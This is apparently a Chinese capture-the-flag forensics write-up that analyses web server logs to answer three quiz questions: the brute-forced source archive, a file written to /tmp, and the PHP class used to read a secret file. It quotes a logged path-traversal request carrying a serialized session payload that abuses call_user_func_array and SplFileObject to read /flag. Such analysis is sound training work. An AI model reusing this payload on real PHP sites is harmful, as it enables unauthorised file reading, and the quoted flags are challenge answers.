題目描述
攻擊者是通過字典的方式爆破網站目錄文件,查找HTTP狀態碼為200的就是答案,又已知源碼文件名一般命名為www.zip

flag:
www.zip
4.2 分析攻擊流量,黑客往/tmp目錄寫入一個文件,文件名為_____________。
wp:
搜索tmp
url解碼后
172.17.0.1 - - [07/Aug/2021:01:38:20 0000] "GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1" 302 879 "-" "python-requests/2.26.0"
flag:
sess_car
4.3 分析攻擊流量,黑客使用的是______類讀取了秘密文件。
wp:
接着上一題,GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1
這個是f反序列化漏洞,因此類SplFileObject
flag:
SplFileObject